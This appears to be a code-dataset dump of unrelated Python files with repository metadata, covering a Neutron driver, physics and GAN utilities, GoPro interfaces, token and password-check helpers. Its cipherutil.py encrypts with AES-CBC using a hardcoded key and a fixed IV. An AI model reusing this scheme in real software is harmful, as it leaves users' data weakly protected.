'physnet': physical_network,
'allowed_physical_networks': self.allowed_physical_networks})
return False
return True
def _is_physical_network_matches(self, physical_network):
"""Return whether the physical network matches the pre-configured
physical-networks of this driver. pre-configured physical-network '*'
means matches anything include none.
:param physical_network: the physical network to check
:return: true if match else false
"""
if (const.PHYSICAL_NETWORK_ANY in self.allowed_physical_networks
or physical_network in self.allowed_physical_networks):
return True
return False
@staticmethod
def _is_port_supported(port_context):
# type: (api.PortContext) -> bool
"""NOTE(turnbig): deprecated, Return whether a port binding is
supported by this driver
Ports supported by this driver must:
- have VNIC type 'baremetal'.
- have physical networks in pre-configured physical-networks
- have
- others maybe? (like Huawei-ml2-driver use prefix)
:param port_context: The port-context to check
:returns: true if supported else false
"""
# TODO(qianbiao.ng): add same strategy like huawei ml2 driver do later.
network = port_context.network.current
physical_network = network.provider_physical_network
this = InfiniBandBaremetalMechanismDriver
return (this._is_baremetal_port(port_context)
and this._is_network_type_supported(network)
and this._is_physical_network_matches(physical_network))
@staticmethod
def _is_port_bound(port_context):
# type: (api.PortContext) -> bool
"""Return whether a port has been bound by this driver.
Ports bound by this driver have their binding:levels contains a level
generated by this driver and the segment of that level is in the
network segments of this port.
NOTE(turnbig): this driver does not have a realistic neutron port
connected to an infiniband port, the port here is a baremetal PXE
ethernet port in the same Ironic node which owns the realistic
infiniband ports.
:param port_context: The PortContext to check
:returns: true if port has been bound by this driver else false
"""
this = InfiniBandBaremetalMechanismDriver
port_id = port_context.current.get('id')
binding_level = this._get_binding_level(port_context)
if binding_level:
segmentation_id = binding_level.get(api.SEGMENTATION_ID)
LOG.info("Port %(port_id)s has been bound to segmentation "
"%(segmentation_id)s by driver %(driver)s",
{"port_id": port_id,
"segmentation_id": segmentation_id,
"driver": const.DRIVE_NAME})
return True
LOG.info("Port %(port_id)s is not bound to any known segmentation "
"of its network by driver %(driver)s",
{"port_id": port_id,
"driver": const.DRIVE_NAME})
return False
@staticmethod
def _get_binding_level(port_context):
# type: (api.PortContext) -> dict
"""Return the binding level relevant to this driver.
Ports bound by this driver have their binding:levels contains a level
generated by this driver and the segment of that level is in the
network segments of this port.
NOTE(turnbig): this driver does not have a realistic neutron port
connected to an infiniband port, the port here is a baremetal PXE
ethernet port in the same Ironic node which owns the realistic
infiniband ports.
:param port_context: The PortContext to check
:returns: binding level if port has been bound by this driver else None
"""
network_segments = port_context.network.network_segments
network_segment_id_list = {s.get(api.SEGMENTATION_ID)
for s in network_segments}
# NOTE(qianbiao.ng): It's impossible to get binding_levels from
# PortContext.binding_levels in this place (only in bind_port
# callback). But, binding_levels is passed as a property in port
# dictionary. Remember this binding_levels property has different
# data structure from PortContext.binding_levels.
"""binding_levels property examples:
[
{
"physical_network": "",
"driver": "mlnx_ib_bm",
"network_type": "vxlan",
"segmentation_id": 15998,
"level": 0
},
....
]
"""
binding_levels = port_context.current.get('binding_levels', [])
LOG.info("Get binding_level of current driver from "
"network segments: %(segments)s, "
"binding levels: %(binding_levels)s.",
{'segments': network_segments,
'binding_levels': binding_levels})
for level in binding_levels:
bound_driver = level.get('driver')
segmentation_id = level.get(api.SEGMENTATION_ID)
if (bound_driver == const.DRIVE_NAME and
segmentation_id in network_segment_id_list):
return level
return None
def _get_ironic_ib_guids(self, node):
"""Get all ib guid list of an Ironic node.
:param node: indicates the uuid of ironic node
:return: infiniband guid list for all present IB ports
"""
try:
node_ports = self.ironic_client.port.list(node=node, detail=True)
node_ib_guids = [node_port.extra.get('client-id')
for node_port in node_ports
if node_port.extra.get('client-id')]
return node_ib_guids
except ironic_exc.UnsupportedVersion:
LOG.exception(
"Failed to get ironic port list, Ironic Client is "
"using unsupported version of the API.")
raise
except (ironic_exc.AuthPluginOptionsMissing,
ironic_exc.AuthSystemNotFound):
LOG.exception("Failed to get ironic port list due to Ironic Client"
" authentication failure.")
raise
except Exception:
LOG.exception("Failed to get ironic port list.")
raise
| 1.5
| 2
|
output/models/nist_data/list_pkg/unsigned_byte/schema_instance/nistschema_sv_iv_list_unsigned_byte_enumeration_2_xsd/__init__.py
|
tefra/xsdata-w3c-tests
| 1
|
12780126
|
<filename>output/models/nist_data/list_pkg/unsigned_byte/schema_instance/nistschema_sv_iv_list_unsigned_byte_enumeration_2_xsd/__init__.py
from output.models.nist_data.list_pkg.unsigned_byte.schema_instance.nistschema_sv_iv_list_unsigned_byte_enumeration_2_xsd.nistschema_sv_iv_list_unsigned_byte_enumeration_2 import (
NistschemaSvIvListUnsignedByteEnumeration2,
NistschemaSvIvListUnsignedByteEnumeration2Type,
)
__all__ = [
"NistschemaSvIvListUnsignedByteEnumeration2",
"NistschemaSvIvListUnsignedByteEnumeration2Type",
]
| 1.117188
| 1
|
src/lipkin/hf.py
|
kim-jane/NuclearManyBody
| 0
|
12780127
|
import numpy as np
from lipkin.model import LipkinModel
class HartreeFock(LipkinModel):
name = 'Hartree-Fock'
def __init__(self, epsilon, V, Omega):
if Omega%2 == 1:
raise ValueError('This HF implementation assumes N = Omega = even.')
LipkinModel.__init__(self, epsilon, V, Omega, Omega)
self.r_gs = (-1)**(0.5*self.Omega)
self.err = 1E-8
def solve_equations(self, num_iter=100, theta0=0.0, phi0=0.0):
# set initial tau
tau = np.array([theta0, phi0])
# construct HF hamiltonian
h = self.get_self_consistent_hamiltonian(tau)
# construct kinetic energy
T = np.zeros((2,2), dtype=np.complex128)
T[0,0] = -0.5*self.epsilon*self.Omega
T[1,1] = 0.5*self.epsilon*self.Omega
# container for single particle potential
Gamma = np.zeros((2,2), dtype=np.complex128)
for i in range(num_iter):
            # solve eigenvalue problem
            eigvals, eigvecs = np.linalg.eig(h)
            # np.linalg.eig does not order eigenvalues, so pick the
            # lowest-energy single-particle state explicitly
            lowest = np.argmin(eigvals.real)
            # construct new density matrix from the occupied state
            rho = np.outer(eigvecs[:, lowest], np.conjugate(eigvecs[:, lowest]))
# construct new potential
Gamma[0,1] = -self.V*self.Omega*(self.Omega-1)*rho[1,0]
Gamma[1,0] = -self.V*self.Omega*(self.Omega-1)*rho[0,1]
# construct new hamiltonian
h = T + Gamma
# calculate energy
E = 0.5*np.trace(np.dot(T+h, rho)).real
return E
def get_self_consistent_hamiltonian(self, tau):
theta, phi = tau[0], tau[1]
h = np.empty((2,2), dtype=np.complex128)
h[0,0] = 1
h[1,1] = -1
h[0,1] = self.chi*np.sin(theta)*np.exp(1j*phi)
h[1,0] = self.chi*np.sin(theta)*np.exp(-1j*phi)
return -0.5*self.epsilon*self.Omega*h
def minimize_energy(self, num_iter=10000):
# pick small initial tau = (theta, phi)
tau = np.random.normal(0.0, 0.1, 2)
# initialize adam optimizer
self.m = np.zeros(2)
self.v = np.zeros(2)
# start minimizing
for self.t in range(1, num_iter+1):
E = self.get_energy(tau)
grad = self.get_gradient_energy(tau)
tau = self.update_tau(tau, grad)
return tau
def minimize_signature_projected_energy(self, r, num_iter=10000):
# pick small initial tau = (theta, phi)
tau = np.random.normal(0.0, 0.1, 2)
# initialize adam optimizer
self.m = np.zeros(2)
self.v = np.zeros(2)
# start minimizing
for self.t in range(1, num_iter+1):
Er = self.get_signature_projected_energy(r, tau)
grad = self.get_gradient_projected_energy(r, tau)
tau = self.update_tau(tau, grad)
return tau
def get_energy(self, tau):
theta, phi = tau[0], tau[1]
E = np.cos(theta)+0.5*self.chi*(np.sin(theta)**2)*np.cos(2*phi);
return -0.5*self.epsilon*self.Omega*E
def get_gradient_energy(self, tau):
theta, phi = tau[0], tau[1]
factor = 0.5*self.epsilon*self.Omega*np.sin(theta)
dE_dtheta = factor*(1-self.chi*np.cos(theta)*np.cos(2*phi))
dE_dphi = factor*self.chi*np.sin(theta)*np.sin(2*phi)
return np.array([dE_dtheta, dE_dphi])
def get_weight(self, r, tau):
theta = tau[0]
a = 1.0+r*self.r_gs*(np.cos(theta))**(self.Omega-2)
b = 1.0+r*self.r_gs*(np.cos(theta))**self.Omega
if a < self.err and b < self.err:
return float((self.Omega-2))/float(self.Omega)
else:
return (a+self.err)/(b+self.err)
def get_gradient_weight(self, r, tau):
theta = tau[0]
a = 2*(1+r*self.r_gs*(np.cos(theta))**self.Omega)-self.Omega*(np.sin(theta))**2
a *= r*self.r_gs*np.sin(theta)*(np.cos(theta))**(self.Omega-3)
b = (1+r*self.r_gs*(np.cos(theta))**self.Omega)**2
if a < self.err and b < self.err:
return np.array([theta*float((self.Omega-2))/float(self.Omega), 0])
return np.array([(a+self.err)/(b+self.err), 0])
def get_signature_projected_energy(self, r, tau):
return self.get_energy(tau)*self.get_weight(r, tau)
def get_gradient_projected_energy(self, r, tau):
E = self.get_energy(tau)
W = self.get_weight(r, tau)
gradE = self.get_gradient_energy(tau)
gradW = self.get_gradient_weight(r, tau)
return E*gradW + W*gradE
def update_tau(self, tau, gradient, eta0=0.001, beta1=0.9, beta2=0.999, epsilon=1.0E-8):
eta = eta0*np.sqrt(1.0-beta2**self.t)/(1.0-beta1**self.t)
self.m = beta1*self.m+(1.0-beta1)*gradient;
self.v = beta2*self.v+(1.0-beta2)*np.square(gradient);
tau -= eta*np.divide(self.m, np.sqrt(self.v)+epsilon)
self.t += 1
return tau
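# Illustrative usage of the class above (the parameter values are arbitrary
# examples chosen here, not taken from the original repository; Omega must be
# even for this implementation):
#   model = HartreeFock(epsilon=1.0, V=0.1, Omega=10)
#   E_hf = model.solve_equations()                         # self-consistent HF energy
#   tau_min = model.minimize_energy()                      # (theta, phi) minimizing E
#   tau_proj = model.minimize_signature_projected_energy(r=model.r_gs)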
| 2.703125
| 3
|
neutron/restproxy/util/cipherutil.py
|
wxjinyq01/esdk_neutron_ac
| 0
|
12780128
|
<filename>neutron/restproxy/util/cipherutil.py<gh_stars>0
# coding:utf-8
# import urllib
from Crypto.Cipher import AES
def rsaEncrypt(text, key):
pass
def aesEncrypt(text):
key = '<KEY>'
cryptor = AES.new(key, AES.MODE_CBC, '0123456789123456')
length = 16
    # pad with spaces so that the length is a non-zero multiple of the AES block size
    count = len(text)
    add = length - (count % length)
    text = text + (' ' * add)
return cryptor.encrypt(text)
def aesDecrypt(text):
key = '<KEY>'
cryptor = AES.new(key, AES.MODE_CBC, '0123456789123456')
return cryptor.decrypt(text)
def hexStr2Byte(str):
pass
def str2HexByte(str):
array = []
if 16 < len(str):
for index in range(len(str)):
array.insert(index, ord(str[index]))
            if 128 < array[index]:
                raise NameError(
                    "Illegal characters, the char have to be ascii.")
    else:
        for index in range(len(str)):
            array.insert(index, ord(str[index]))
            if 128 < array[index]:
                raise NameError(
                    "Illegal characters, the char have to be ascii.")
        # pad the byte array with zeros up to the 16-byte block size
        index = len(str)
        while index < 16:
            array.append(0)
            index += 1
return array
| 2.953125
| 3
|
cuda_cffi/info.py
|
grlee77/python-cuda-cffi
| 13
|
12780129
|
<reponame>grlee77/python-cuda-cffi
#!/usr/bin/env python
"""
cuda_cffi
=========
cuda_cffi provides python interfaces to a subset of functions defined in the
cuSPARSE and cuSOLVER libraries distributed as part of NVIDIA's CUDA
Programming Toolkit [1]_. It is meant to complement the existing scikits.cuda
package [2]_ which wraps cuBLAS, CULA, etc. This package uses PyCUDA [3]_ to
provide high-level functions comparable to those in the NumPy package [4]_.
Low-level modules
------------------
- cusparse cuSPARSE functions
- cusolver cuSOLVER functions
- misc Miscellaneous support functions.
High-level modules
------------------
- cusparse higher-level cuSPARSE CSR class
.. [1] http://www.nvidia.com/cuda
.. [2] http://scikits.appspot.com/cuda
.. [3] http://mathema.tician.de/software/pycuda/
.. [4] http://numpy.scipy.org/
"""
| 1.710938
| 2
|
cohesity_management_sdk/models/virtual_disk_mapping_response.py
|
nick6655/management-sdk-python
| 18
|
12780130
|
<reponame>nick6655/management-sdk-python
# -*- coding: utf-8 -*-
# Copyright 2021 Cohesity Inc.
import cohesity_management_sdk.models.virtual_disk_id_information
import cohesity_management_sdk.models.protection_source
class VirtualDiskMappingResponse(object):
"""Implementation of the 'VirtualDiskMappingResponse' model.
Specifies information about virtual disks where a user can specify
mappings
of source disk and destination disk to overwrite.
Attributes:
disk_to_overwrite (VirtualDiskIdInformation): Specifies information
about disk which user wants to overwrite. If specified, then
powerOffVmBeforeRecovery must be true.
source_disk (VirtualDiskIdInformation): Specifies information about
the source disk.
target_location (ProtectionSource): Specifies the target location
information, for e.g. a datastore in VMware environment. If
diskToOverwrite is specified, then the target location is
automatically deduced.
"""
# Create a mapping from Model property names to API property names
_names = {
"disk_to_overwrite":'diskToOverwrite',
"source_disk":'sourceDisk',
"target_location":'targetLocation'
}
def __init__(self,
disk_to_overwrite=None,
source_disk=None,
target_location=None):
"""Constructor for the VirtualDiskMappingResponse class"""
# Initialize members of the class
self.disk_to_overwrite = disk_to_overwrite
self.source_disk = source_disk
self.target_location = target_location
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
disk_to_overwrite = cohesity_management_sdk.models.virtual_disk_id_information.VirtualDiskIdInformation.from_dictionary(dictionary.get('diskToOverwrite')) if dictionary.get('diskToOverwrite') else None
source_disk = cohesity_management_sdk.models.virtual_disk_id_information.VirtualDiskIdInformation.from_dictionary(dictionary.get('sourceDisk')) if dictionary.get('sourceDisk') else None
target_location = cohesity_management_sdk.models.protection_source.ProtectionSource.from_dictionary(dictionary.get('targetLocation')) if dictionary.get('targetLocation') else None
# Return an object of this model
return cls(disk_to_overwrite,
source_disk,
target_location)
| 2.765625
| 3
|
lossfunction.py
|
ChristophReich1996/DeepFoveaPP_for_Video_Reconstruction_and_Super_Resolution
| 3
|
12780131
|
from typing import List, Tuple
import torch
import torch.nn as nn
import torch.nn.functional as F
import robust_loss_pytorch
class AdaptiveRobustLoss(nn.Module):
"""
This class implements the adaptive robust loss function proposed by <NAME> for image tensors
"""
def __init__(self, device: str = 'cuda:0', num_of_dimension: int = 3 * 6 * 1024 * 768) -> None:
"""
Constructor method
"""
super(AdaptiveRobustLoss, self).__init__()
# Save parameter
self.num_of_dimension = num_of_dimension
# Init adaptive loss module
self.loss_function = robust_loss_pytorch.AdaptiveLossFunction(num_dims=num_of_dimension, device=device,
float_dtype=torch.float)
def forward(self, prediction: torch.Tensor, label: torch.Tensor) -> torch.Tensor:
"""
Forward pass of the loss module
:param prediction: (torch.Tensor) Prediction
:param label: (torch.Tensor) Corresponding label
:return: (torch.Tensor) Scalar loss value
"""
        # Calc difference of the prediction and the label
loss = prediction - label
# Reshape loss to use adaptive loss module
loss = loss.view(-1, self.num_of_dimension)
# Perform adaptive loss
loss = self.loss_function.lossfun(loss)
# Perform mean reduction
loss = loss.mean()
return loss
class WassersteinDiscriminatorLoss(nn.Module):
"""
This class implements the wasserstein loss for a discriminator network
"""
def __init__(self) -> None:
"""
Constructor method
"""
# Call super constructor
super(WassersteinDiscriminatorLoss, self).__init__()
def forward(self, prediction_real: torch.Tensor, prediction_fake: torch.Tensor) -> Tuple[
torch.Tensor, torch.Tensor]:
"""
Forward pass of the loss module
:param prediction_real: (torch.Tensor) Prediction for real samples
        :param prediction_fake: (torch.Tensor) Prediction for fake samples
:return: (torch.Tensor) Scalar loss value
"""
# Compute loss
loss_real = - torch.mean(prediction_real)
loss_fake = torch.mean(prediction_fake)
return loss_real, loss_fake
class WassersteinGeneratorLoss(nn.Module):
"""
This class implements the wasserstein loss for a generator network
"""
def __init__(self) -> None:
"""
Constructor method
"""
# Call super constructor
super(WassersteinGeneratorLoss, self).__init__()
def forward(self, prediction_fake: torch.Tensor) -> torch.Tensor:
"""
Forward pass of the loss module
        :param prediction_fake: (torch.Tensor) Prediction for fake samples
:return: (torch.Tensor) Scalar loss value
"""
# Compute loss
loss = - torch.mean(prediction_fake)
return loss
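# Sketch of how the two Wasserstein losses above could be wired into a GAN
# training step (the discriminator `d`, generator output `fake`, real batch
# `real` and the optimizers are assumed to exist elsewhere; this wiring is an
# illustration, not code from the original repository):
#   d_loss_real, d_loss_fake = WassersteinDiscriminatorLoss()(d(real), d(fake.detach()))
#   (d_loss_real + d_loss_fake).backward()
#   g_loss = WassersteinGeneratorLoss()(d(fake))
#   g_loss.backward()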
class NonSaturatingLogisticGeneratorLoss(nn.Module):
'''
Implementation of the non saturating GAN loss for the generator network
Source: https://github.com/ChristophReich1996/BCS_Deep_Learning/blob/master/Semantic_Pyramid_Style_Gan_2/lossfunction.py
'''
def __init__(self) -> None:
'''
Constructor method
'''
# Call super constructor
super(NonSaturatingLogisticGeneratorLoss, self).__init__()
def __repr__(self):
'''
Get representation of the loss module
:return: (str) String including information
'''
return '{}'.format(self.__class__.__name__)
def forward(self, prediction_fake: torch.Tensor) -> torch.Tensor:
'''
Forward pass to compute the generator loss
:param prediction_fake: (torch.Tensor) Prediction of the discriminator for fake samples
:return: (torch.Tensor) Loss value
'''
# Calc loss
loss = torch.mean(F.softplus(-prediction_fake))
return loss
class NonSaturatingLogisticDiscriminatorLoss(nn.Module):
'''
Implementation of the non saturating GAN loss for the discriminator network
Source: https://github.com/ChristophReich1996/BCS_Deep_Learning/blob/master/Semantic_Pyramid_Style_Gan_2/lossfunction.py
'''
def __init__(self) -> None:
'''
Constructor
'''
# Call super constructor
super(NonSaturatingLogisticDiscriminatorLoss, self).__init__()
def forward(self, prediction_real: torch.Tensor, prediction_fake: torch.Tensor) -> Tuple[
torch.Tensor, torch.Tensor]:
'''
Forward pass. Loss parts are not summed up to not retain the whole backward graph later.
:param prediction_real: (torch.Tensor) Prediction of the discriminator for real images
:param prediction_fake: (torch.Tensor) Prediction of the discriminator for fake images
:return: (torch.Tensor) Loss values for real and fake part
'''
# Calc real loss part
loss_real = torch.mean(F.softplus(-prediction_real))
# Calc fake loss part
loss_fake = torch.mean(F.softplus(prediction_fake))
return loss_real, loss_fake
class PerceptualLoss(nn.Module):
"""
This class implements perceptual loss
"""
def __init__(self, loss_function: nn.Module = nn.L1Loss(reduction='mean')) -> None:
"""
Constructor method
:param loss_function: (nn.Module) Loss function to be utilized to construct the perceptual loss
"""
# Call super constructor
super(PerceptualLoss, self).__init__()
# Save loss function
self.loss_function = loss_function
def forward(self, features_prediction: List[torch.Tensor], features_label: List[torch.Tensor]) -> torch.Tensor:
"""
Forward pass of the loss module
:param features_prediction: (List[torch.Tensor]) List of VGG-19 features of the prediction
:param features_label: (List[torch.Tensor]) List of VGG-19 features of the label
:return: (torch.Tensor) Scalar loss value
"""
# Init loss value
loss = torch.tensor(0.0, dtype=torch.float, device=features_prediction[0].device)
# Loop over all features
for feature_prediction, feature_label in zip(features_prediction, features_label):
# Calc loss and sum up
loss = loss + self.loss_function(feature_prediction, feature_label)
# Average loss with number of features
loss = loss / len(features_prediction)
return loss
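# Minimal illustrative call of PerceptualLoss with random tensors standing in
# for VGG-19 feature maps (the shapes are arbitrary examples, not taken from
# the original repository):
#   feats_pred = [torch.randn(2, 64, 64, 64), torch.randn(2, 128, 32, 32)]
#   feats_true = [torch.randn(2, 64, 64, 64), torch.randn(2, 128, 32, 32)]
#   loss = PerceptualLoss()(feats_pred, feats_true)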
| 3.265625
| 3
|
pwcheck.py
|
madfordmac/scripts
| 0
|
12780132
|
<reponame>madfordmac/scripts
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
from hashlib import sha1
import requests
import argparse
import sys, os
parser = argparse.ArgumentParser(description="Check your password against the https://haveibeenpwned.com/ API.")
parser.add_argument('-q', '--quiet', action="store_true", help="No STDOUT. Only output is via return code.")
parser.add_argument("passwd", nargs="?", help="Password to check. If not provided, will also check $PWCHECK or prompt.")
def check_hash(h):
"""
Do the heavy lifting. Take the hash, poll the haveibeenpwned API, and check results.
:param h: The sha1 hash to check
:return: The number of times the password has been found (0 is good!)
"""
if len(h) != 40:
        raise ValueError("A sha1 hash should be 40 characters.")
h = h.upper()
chk = h[:5]
r = requests.get("https://api.pwnedpasswords.com/range/%s" % chk)
if r.status_code != 200:
raise EnvironmentError("Unable to retrieve password hashes from server.")
matches = {m: int(v) for (m, v) in [ln.split(':') for ln in r.content.decode('utf-8').split("\r\n")]}
#print("Prefix search returned %d potential matches." % len(matches))
for m in matches.keys():
if m == h[5:]:
return matches[m]
return 0
def check_password(p):
"""
Convenience function that calculates the hash for you, then runs check_hash.
:param p: The password to check
:return: The check_hash result for the password
"""
s = sha1()
s.update(p.encode('utf-8'))
return check_hash(s.hexdigest())
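# Illustrative behaviour of check_password (requires network access to the
# pwnedpasswords range API; the example passwords are hypothetical and the
# exact counts depend on the live breach dataset):
#   check_password("password123")              -> some large positive count
#   check_password("a-long-random-passphrase") -> 0 if it has never been leaked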
def main(args):
passwd = ''
if args.passwd:
passwd = args.passwd
elif 'PWCHECK' in os.environ:
passwd = os.environ['PWCHECK']
else:
from getpass import getpass
passwd = getpass()
r = check_password(passwd)
if r > 0:
        args.quiet or print("Password found on %d lists." % r)
sys.exit(1)
else:
args.quiet or print("Password has not been compromised.")
sys.exit(0)
if __name__ == '__main__':
args = parser.parse_args()
main(args)
| 3.5625
| 4
|
auth.py
|
Bociany/Moodai
| 0
|
12780133
|
<reponame>Bociany/Moodai<filename>auth.py
from pymemcache.client.base import Client
import secrets
import hashlib
memcached_client = Client(("localhost", 11211))
TOKEN_EXPIRATION = 60*60*24
print("auth: memcached hot token cache backend started!")
# Generates a new token for a user
def generate_token(id):
token = secrets.token_urlsafe(32)
memcached_client.set(token, id, expire=TOKEN_EXPIRATION)
return token
def remove_token(token):
if (token_exists(token)):
memcached_client.delete(token)
def token_exists(token):
return memcached_client.get(token) is not None
# Verifies if a token is proper
def verify_token(token):
cached_id = memcached_client.get(token)
if cached_id is not None:
return cached_id
def hash_multiple(arr):
hash = hashlib.sha3_256()
for obj in arr:
hash.update(obj.encode('utf-8'))
return hash.hexdigest()
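# Illustrative login/logout flow using the helpers above (assumes a memcached
# instance is listening on localhost:11211; `user_id` is a hypothetical value):
#   token = generate_token(user_id)   # cache token -> user_id for 24 hours
#   verify_token(token)               # returns the cached id, or None if expired
#   remove_token(token)               # explicit invalidation, e.g. on logout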
| 2.703125
| 3
|
demos/python/sdk_wireless_camera_control/open_gopro/interfaces.py
|
hypoxic/OpenGoPro
| 1
|
12780134
|
<gh_stars>1-10
# interfaces.py/Open GoPro, Version 1.0 (C) Copyright 2021 GoPro, Inc. (http://gopro.com/OpenGoPro).
# This copyright was auto-generated on Tue May 18 22:08:50 UTC 2021
"""Interfaces that must be defined outside of other files to avoid circular imports."""
from abc import ABC, abstractmethod
from typing import Callable, Generic, Pattern, Optional, List, Tuple, TypeVar
from open_gopro.services import AttributeTable
NotiHandlerType = Callable[[int, bytes], None]
BleDevice = TypeVar("BleDevice")
BleClient = TypeVar("BleClient")
class BLEController(ABC, Generic[BleClient, BleDevice]):
"""Interface definition for a BLE driver to be used by GoPro."""
@abstractmethod
async def read(self, client: BleClient, uuid: str) -> bytearray:
"""Read a bytestream response from a UUID.
Args:
            client (Client): client to read from
uuid (UUID): UUID to read from
Returns:
bytearray: response
"""
raise NotImplementedError
@abstractmethod
async def write(self, client: BleClient, uuid: str, data: bytearray) -> None:
"""Write a bytestream to a UUID.
Args:
            client (Client): client to write to
            uuid (UUID): UUID to write to
            data (bytearray): bytestream to write
        """
raise NotImplementedError
@abstractmethod
    async def scan(self, token: Pattern, timeout: int = 5) -> BleDevice:
        """Scan for a BLE device with a regex in its device name.
Args:
token (Pattern): Regex to scan for
            timeout (int, optional): Time in seconds to scan before giving up. Defaults to 5.
Returns:
Device: discovered device (shall not be multiple devices)
"""
raise NotImplementedError
@abstractmethod
async def connect(self, device: BleDevice, timeout: int = 15) -> BleClient:
"""Connect to a BLE device.
Args:
device (Device): device to connect to
timeout (int, optional): Timeout before considering connection establishment a failure. Defaults to 15.
Returns:
Client: client that has been connected to
"""
raise NotImplementedError
@abstractmethod
async def pair(self, client: BleClient) -> None:
"""Pair to an already connected client.
Args:
client (Client): client to pair to
"""
raise NotImplementedError
@abstractmethod
async def enable_notifications(self, client: BleClient, handler: NotiHandlerType) -> None:
"""Enable notifications for all notifiable characteristics.
        The handler is used to register for notifications. It will be called when a notification
is received.
Args:
client (Client): client to enable notifications on
handler (Callable): notification handler
"""
raise NotImplementedError
@abstractmethod
async def discover_chars(self, client: BleClient) -> AttributeTable:
"""Discover all characteristics for a connected client.
Args:
client (Client): client to discover on
Returns:
AttributeTable: dictionary of discovered services and characteristics indexed by UUID
"""
raise NotImplementedError
@abstractmethod
async def disconnect(self, client: BleClient) -> bool:
"""Terminate the BLE connection.
Args:
client (Client): client to disconnect from
"""
raise NotImplementedError
class WifiController(ABC):
"""Interface definition for a Wifi driver to be used by GoPro."""
@abstractmethod
def connect(self, ssid: str, password: str, timeout: float = 15) -> bool:
"""Connect to a network.
Args:
ssid (str): SSID of network to connect to
password (str): password of network to connect to
timeout (float, optional): Time before considering connection failed (in seconds). Defaults to 15.
Returns:
bool: True if successful, False otherwise
"""
raise NotImplementedError
@abstractmethod
def disconnect(self) -> bool:
"""Disconnect from a network.
Returns:
bool: True if successful, False otherwise
"""
raise NotImplementedError
@abstractmethod
def current(self) -> Tuple[Optional[str], Optional[str]]:
"""Return the SSID and state of the current network.
Returns:
Tuple[Optional[str], Optional[str]]: Tuple of SSID and state. State is optional. If SSID is None,
there is no current connection
"""
raise NotImplementedError
@abstractmethod
def interfaces(self) -> List[str]:
"""Return a list of wireless adapters.
Returns:
List[str]: adapters
"""
raise NotImplementedError
@abstractmethod
def interface(self, interface: Optional[str]) -> Optional[str]:
"""Get or set the currently used wireless adapter.
Args:
interface (str, optional): Get if the interface parameter is None. Set otherwise. Defaults to None.
Returns:
Optional[str]: Name of interface if get. None if set.
"""
raise NotImplementedError
@abstractmethod
def power(self, power: bool) -> None:
"""Enable / disable the wireless driver.
Args:
power (bool, optional): Enable if True. Disable if False.
"""
raise NotImplementedError
@property
@abstractmethod
def is_on(self) -> bool:
"""Is the wireless driver currently enabled.
Returns:
bool: True if yes. False if no.
"""
raise NotImplementedError
class GoProError(Exception):
"""Base class for other exceptions."""
def __init__(self, message: str) -> None:
super().__init__(f"GoPro Error: {message}")
class ScanFailedToFindDevice(GoProError):
"""The scan failed without finding a device."""
def __init__(self) -> None:
super().__init__("A scan timed out without finding a device")
class ConnectFailed(GoProError):
"""A BLE or WiFi connection failed to establish
Args:
connection (str): type of connection that failed
retries (int): how many retries were attempted
timeout (int): the timeout used for each attempt
"""
def __init__(self, connection: str, timeout: float, retries: int):
super().__init__(
f"{connection} connection failed to establish after {retries} retries with timeout {timeout}"
)
class ResponseTimeout(GoProError):
"""A response has timed out."""
def __init__(self, timeout: float) -> None:
super().__init__(f"Response timeout occurred of {timeout} seconds")
class GoProNotInitialized(GoProError):
"""A command was attempted without waiting for the GoPro instance to initialize."""
def __init__(self) -> None:
super().__init__("GoPro has not been initialized yet")
| 2.296875
| 2
|
ProgettoLube/WebInspector/venv/Lib/site-packages/tensorflow/_api/v2/compat/v1/feature_column/__init__.py
|
Lube-Project/ProgettoLube
| 2
|
12780135
|
<filename>ProgettoLube/WebInspector/venv/Lib/site-packages/tensorflow/_api/v2/compat/v1/feature_column/__init__.py
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.feature_column namespace.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow.python.feature_column.feature_column import input_layer
from tensorflow.python.feature_column.feature_column import linear_model
from tensorflow.python.feature_column.feature_column import make_parse_example_spec
from tensorflow.python.feature_column.feature_column_v2 import bucketized_column
from tensorflow.python.feature_column.feature_column_v2 import categorical_column_with_hash_bucket
from tensorflow.python.feature_column.feature_column_v2 import categorical_column_with_identity
from tensorflow.python.feature_column.feature_column_v2 import categorical_column_with_vocabulary_file
from tensorflow.python.feature_column.feature_column_v2 import categorical_column_with_vocabulary_list
from tensorflow.python.feature_column.feature_column_v2 import crossed_column
from tensorflow.python.feature_column.feature_column_v2 import embedding_column
from tensorflow.python.feature_column.feature_column_v2 import indicator_column
from tensorflow.python.feature_column.feature_column_v2 import numeric_column
from tensorflow.python.feature_column.feature_column_v2 import shared_embedding_columns
from tensorflow.python.feature_column.feature_column_v2 import weighted_categorical_column
from tensorflow.python.feature_column.sequence_feature_column import sequence_categorical_column_with_hash_bucket
from tensorflow.python.feature_column.sequence_feature_column import sequence_categorical_column_with_identity
from tensorflow.python.feature_column.sequence_feature_column import sequence_categorical_column_with_vocabulary_file
from tensorflow.python.feature_column.sequence_feature_column import sequence_categorical_column_with_vocabulary_list
from tensorflow.python.feature_column.sequence_feature_column import sequence_numeric_column
del _print_function
| 1.851563
| 2
|
setup.py
|
ImperialCollegeLondon/guikit
| 3
|
12780136
|
"""
Only needed to install the tool in editable mode. See:
https://setuptools.readthedocs.io/en/latest/userguide/quickstart.html#development-mode
"""
import setuptools
setuptools.setup()
| 0.914063
| 1
|
lambo/models/masked_layers.py
|
samuelstanton/lambo
| 10
|
12780137
|
<reponame>samuelstanton/lambo
import torch
import torch.nn as nn
class Apply(nn.Module):
def __init__(self, module, dim=0):
super().__init__()
self.module = module
self.dim = dim
def forward(self, x):
xs = list(x)
xs[self.dim] = self.module(xs[self.dim])
return xs
class LayerNorm1d(nn.BatchNorm1d):
    """Per-sample layer norm over the channel and token dimensions, implemented on top of nn.BatchNorm1d parameters (no masking is applied here)"""
def forward(self, x):
"""input (B,c,n), computes statistics averaging over c and n"""
sum_dims = list(range(len(x.shape)))[1:]
xmean = x.mean(dim=sum_dims, keepdims=True)
xxmean = (x * x).mean(dim=sum_dims, keepdims=True)
var = xxmean - xmean * xmean
std = var.clamp(self.eps) ** 0.5
ratio = self.weight[:, None] / std
output = x * ratio + (self.bias[:, None] - xmean * ratio)
return output
